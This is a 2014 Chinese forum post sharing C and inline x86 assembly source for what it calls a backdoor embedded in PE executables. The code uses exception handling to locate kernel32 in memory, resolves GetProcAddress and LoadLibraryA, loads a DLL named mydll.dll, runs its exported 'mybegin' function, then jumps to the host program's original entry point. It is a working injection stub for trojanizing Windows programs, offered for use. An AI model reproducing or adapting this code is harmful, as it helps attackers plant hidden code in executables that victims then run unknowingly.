PE可执行文件的镶入式程序后门开发

大灰狼 · 发表于 2014-7-21 08:26:52

/* 利用异常结构处理搜索GetProcAddress入口地址 */ #include <STDIO.H> #include <WINDOWS.H> main() { _asm { call ex//取得当前地址以计算异常结构开始的地址 mov eax,0x77000000 mov [ebp-0ch],eax mov eax,esp sub eax,8 xchg fs:[0],eax mov DWORD ptr[ebp-00h],eax mov eax,fs:[4] mov DWORD ptr[ebp-04h],eax mov fs:[4h],ebp//保存ebp到fs:[4h]中 add ecx,34h push ecx push eax mov edx,0 mov byte ptr [edx],0//产生错误 } //异常结构开始 _asm { mov ebp,fs:[4] mov dword ptr [ebp-8h],0 //for(;imgbase<0xff000000,procgetadd==0;){ e104f: cmp dword ptr [ebp-8h],0 jne exi //imgbase+=0x10000; mov eax,[ebp-0ch] add eax,10000h mov [ebp-0ch],eax //if(imgbase==0x78000000) imgbase=0xbff00000; cmp dword ptr [ebp-0ch],78000000h jne is44 mov dword ptr [ebp-0ch],0BFF00000h /*if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){*/ is44: mov ecx,dword ptr [ebp-0ch] xor edx,edx mov dx,word ptr [ecx] mov dword ptr [ebp-24h],ecx cmp edx,5A4Dh//ZM jne e11db mov eax,[ebp-0ch] mov ecx,dword ptr [eax+3Ch] mov edx,dword ptr [ebp-0ch] xor eax,eax mov ax,word ptr [edx+ecx] cmp eax,4550h jne e11db //fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase; mov ecx,dword ptr [ebp-0ch] mov edx,dword ptr [ecx+3Ch] mov eax,[ebp-0ch] mov ecx,dword ptr [eax+edx+78h] add ecx,dword ptr [ebp-0ch] mov dword ptr [ebp-10h],ecx // k=*(int *)(fnbase+0xc)+imgbase; mov edx,dword ptr [ebp-10h] mov eax,dword ptr [edx+0Ch] add eax,dword ptr [ebp-0ch] mov dword ptr [ebp-14h],eax //if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ mov ecx,dword ptr [ebp-14h] cmp dword ptr [ecx],4E52454Bh jne e11db mov edx,dword ptr [ebp-14h] cmp dword ptr [edx+4],32334C45h jne e11db //k=imgbase+*(int *)(fnbase+0x20); mov eax,dword ptr [ebp-10h] mov ecx,dword ptr [ebp-0ch] add ecx,dword ptr [eax+20h] mov dword ptr [ebp-14h],ecx //for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){ mov dword ptr [ebp-18h],0 jmp e1127 e1115: mov edx,dword ptr [ebp-18h] add edx,1 mov dword ptr [ebp-18h],edx mov eax,dword ptr [ebp-14h] add eax,4 mov dword ptr [ebp-14h],eax e1127: mov ecx,dword ptr [ebp-10h] mov edx,dword ptr [ebp-18h] cmp edx,dword ptr [ecx+18h] jge e11db /*if(*(int *)(imgbase+*(int *)k)=='tixE'&&*(int *)(4+imgbase+*(int *)k)=='corP'){GetProcAddress*/ mov eax,dword ptr [ebp-14h] mov ecx,dword ptr [eax] mov edx,dword ptr [ebp-0ch] cmp dword ptr [edx+ecx],'PteG' jne e11d6 mov eax,dword ptr [ebp-14h] mov ecx,dword ptr [eax] mov edx,dword ptr [ebp-0ch] cmp dword ptr [edx+ecx+4],'Acor' jne e11d6 //k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24)); mov eax,dword ptr [ebp-18h] add eax,dword ptr [ebp-18h] add eax,dword ptr [ebp-0ch] mov ecx,dword ptr [ebp-10h] mov edx,dword ptr [ecx+24h] xor ecx,ecx mov cx,word ptr [eax+edx] mov dword ptr [ebp-14h],ecx //k+=*(int *)(fnbase+0x10)-1; mov edx,dword ptr [ebp-10h] mov eax,dword ptr [edx+10h] mov ecx,dword ptr [ebp-14h] lea edx,dword ptr [ecx+eax-1] mov dword ptr [ebp-14h],edx //k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c)); mov eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-14h] add eax,dword ptr [ebp-0ch] mov ecx,dword ptr [ebp-10h] mov edx,dword ptr [ecx+1Ch] mov eax,dword ptr [eax+edx] mov dword ptr [ebp-14h],eax mov edx,dword ptr [ebp-14h] //add edx,imgbase add edx,dword ptr [ebp-0ch] // mov procgetadd,edx mov dword ptr [ebp-8h],edx //恢复异常结构 mov eax,DWORD ptr[ebp-00h] mov fs:[0],eax mov eax,DWORD ptr[ebp-04h] mov fs:[4],eax jmp e11db e11d6: jmp e1115 e11db: jmp e104f } ////////////////////////////////////////////////////////////// exi: //取得LoadLibraryA入口地址 _asm { mov dword ptr [ebp-124h],'daoL' mov dword ptr [ebp-120h],'rbiL' mov dword ptr [ebp-11Ch],'Ayra' mov dword ptr [ebp-118h],0000h lea eax,[ebp-124h] push eax mov ebx,dword ptr [ebp-24h]//kernel32.dll 入口地址 push ebx mov eax,dword ptr [ebp-8h] mov dword ptr [ebp-4008h],eax//GetProcAddress 入口地址 call eax mov dword ptr [ebp-400ch],eax//LoadLibraryA 入口地址 } //加载 mydll.dll _asm { mov dword ptr [ebp-124h],'ldym' mov dword ptr [ebp-120h],'ld.l' mov dword ptr [ebp-11Ch],'l' mov dword ptr [ebp-118h],0000h lea eax,[ebp-124h] push eax call dword ptr [ebp-400ch] cmp eax,0 jz exit1 mov ebx,eax //取得mybegin入口地址 mov dword ptr [ebp-124h],'gebM' mov dword ptr [ebp-120h],'ni' mov dword ptr [ebp-11Ch],0000h mov dword ptr [ebp-118h],0000h lea eax,[ebp-124h] push eax push ebx call dword ptr [ebp-4008h] mov dword ptr [ebp-4030h],eax//mybegin入口地址 cmp eax,0 jz exit1 call eax //执行mybegin jmp exit1 } ex: _asm { pop ecx push ecx ret } exit1: _asm { mov eax,0x401000 //这个跳转地址在代码中需要更改 jmp eax } return 0; }

		自动登录	找回密码
密码			立即注册

[源码分享] PE可执行文件的镶入式程序后门开发